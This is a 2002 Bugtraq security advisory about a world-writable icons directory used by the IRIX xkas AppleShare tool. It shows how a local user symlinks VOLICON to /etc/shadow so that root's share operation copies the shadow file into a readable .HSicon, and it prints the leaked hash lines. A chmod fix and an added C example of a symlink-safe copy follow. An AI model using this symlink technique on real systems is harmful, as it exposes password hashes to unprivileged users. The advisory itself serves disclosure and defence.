[ Hackerslab bug_paper ] Xkas application vulnerability
Date: Mon, 28 Jan 2002 18:06:16 +0900 (KST)
Message-Id: <200201280906.g0S96G108914@ce.hannam.ac.kr>
From: s96192@ce.hannam.ac.kr
To: bugtraq@securityfocus.com
=============================================================================
[ Hackerslab bug_paper ] Xkas application vulnerability
=============================================================================
File : /usr/etc/appletalk/xkas application
SYSTEM : tested on IRIX 6.5
INFO :
Xkas is a server administration tool for AppleShare. A misconfiguration that is acted on by a user with root privilege can lead to a serious security vulnerability.
A .HSResource directory and a .HSicon file are created when a directory is shared.
The .HSicon file is created by copying /var/adm/appletalk/icons/VOLICON. The problem is that the /var/adm/appletalk/icons directory has permission mode 777 (world-writable), so VOLICON can be replaced by any local user.
Symlink the desired file to VOLICON as shown below.
$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx 4 root sys 57 Jan 25 03:12 .
drwxr-xr-x 6 root sys 4096 Jan 24 16:05 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource
lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON -> /etc/shadow
When the administrator uses /usr/etc/appletalk/xkas to share the root directory, the following files are created in the root directory.
$ ls -al /
total 17099
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource
-rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon
(etc..)
$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)
SOLUTION :
Remove the other-write permission from the icons directory, and contact your vendor for a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons
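As an added illustration (not code from this advisory or from the xkas program itself), the C code below shows, on the application side, the two checks that close the hole described in the INFO section: a privileged copy must refuse a source that is a symbolic link, and an administrator's audit should flag a source whose directory is world-writable. The function names, the scratch directory under /tmp, the file names inside it and the sample shadow line are all constructed for the demo.

```c
/* Added example: a symlink-safe icon copy. This is not code from the advisory
 * or from SGI's xkas; function names and the scratch files are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if the directory holding `path` has the other-write bit set (the 777
 * misconfiguration in the advisory), 0 if not, -1 on error. */
int parent_world_writable(const char *path)
{
    char *copy = strdup(path);          /* dirname() may modify its argument */
    if (!copy) return -1;
    struct stat st;
    int result = (lstat(dirname(copy), &st) == 0) ? ((st.st_mode & S_IWOTH) != 0) : -1;
    free(copy);
    return result;
}

/* Copy regular file src to a new file dst without following a symlink at
 * either end. Returns 0 on success, -1 with errno set (ELOOP: src is a link). */
int copy_icon_safely(const char *src, const char *dst)
{
    struct stat pre, post;
    if (lstat(src, &pre) != 0) return -1;
    if (S_ISLNK(pre.st_mode)) { errno = ELOOP; return -1; }
    if (!S_ISREG(pre.st_mode)) { errno = EINVAL; return -1; }
    /* O_NOFOLLOW closes the race between the lstat above and this open */
    int in = open(src, O_RDONLY | O_NOFOLLOW);
    if (in < 0) return -1;
    /* confirm the object actually opened is the one lstat examined */
    if (fstat(in, &post) != 0 || !S_ISREG(post.st_mode) ||
        post.st_dev != pre.st_dev || post.st_ino != pre.st_ino) {
        close(in); errno = EINVAL; return -1;
    }
    /* O_EXCL: never write through a pre-existing dst, linked or not */
    int out = open(dst, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (out < 0) { int e = errno; close(in); errno = e; return -1; }
    char buf[4096];
    ssize_t n, off, w;
    int err = 0;
    while ((n = read(in, buf, sizeof buf)) > 0) {
        for (off = 0; off < n; off += w)
            if ((w = write(out, buf + off, n - off)) < 0) { err = errno; break; }
        if (err) break;
    }
    if (n < 0) err = errno;
    close(in);
    close(out);
    if (err) { unlink(dst); errno = err; return -1; }
    return 0;
}

/* Self-test on a constructed scratch directory: a genuine icon file, a sample
 * shadow line standing in for /etc/shadow, and VOLICON -> that sample.
 * Returns 0 when every check behaves as intended, the failing step otherwise. */
int self_test(void)
{
    char tmpl[] = "/tmp/xkas-demo-XXXXXX";
    char *dir = mkdtemp(tmpl);
    if (!dir) return -1;
    char regular[300], secret[300], link[300], out[300];
    snprintf(regular, sizeof regular, "%s/VOLICON.regular", dir);
    snprintf(secret, sizeof secret, "%s/shadow.sample", dir);
    snprintf(link, sizeof link, "%s/VOLICON", dir);
    snprintf(out, sizeof out, "%s/.HSicon", dir);
    int rc = -1;
    FILE *f = fopen(regular, "w");
    if (!f) goto done;
    fputs("icon bytes\n", f); fclose(f);
    if (!(f = fopen(secret, "w"))) goto done;
    fputs("root:CONSTRUCTED_HASH:10908::::::\n", f); fclose(f);   /* constructed */
    if (symlink(secret, link) != 0) goto done;
    /* step 1: the symlinked VOLICON is refused and no .HSicon is written */
    if (copy_icon_safely(link, out) == 0 || errno != ELOOP || access(out, F_OK) == 0) { rc = 1; goto done; }
    /* step 2: a genuine icon file copies normally */
    if (copy_icon_safely(regular, out) != 0) { rc = 2; goto done; }
    /* step 3: the directory-permission audit behind the SOLUTION's chmod o-w */
    if (chmod(dir, 0777) != 0 || parent_world_writable(link) != 1) { rc = 3; goto done; }
    if (chmod(dir, 0755) != 0 || parent_world_writable(link) != 0) { rc = 4; goto done; }
    rc = 0;
done:
    unlink(out); unlink(link); unlink(secret); unlink(regular); rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = self_test();
    if (rc == 0) puts("symlink refused, regular file copied, o+w detected");
    else printf("self test failed at step %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

The lstat check on its own still leaves a window between the check and the open in which the file could be swapped for a link; opening with O_NOFOLLOW and then comparing the opened inode with the one lstat saw removes that window. The destination is created with O_EXCL so that a pre-existing .HSicon that is itself a link is never written through. Removing the other-write bit from the directory, as the SOLUTION section instructs, is what stops an unprivileged user from placing the link in the first place; the code-side checks are the belt to that pair of braces.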
==-------------------------------------------------------------------------==
*********
* ** ** *
* ** ** *
* ******* * Kim Yong-Jun
* ** ** * loveyou@hackerslab.org
* ** ** * [ http://www.hackerslab.org ]
********* HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------==
용준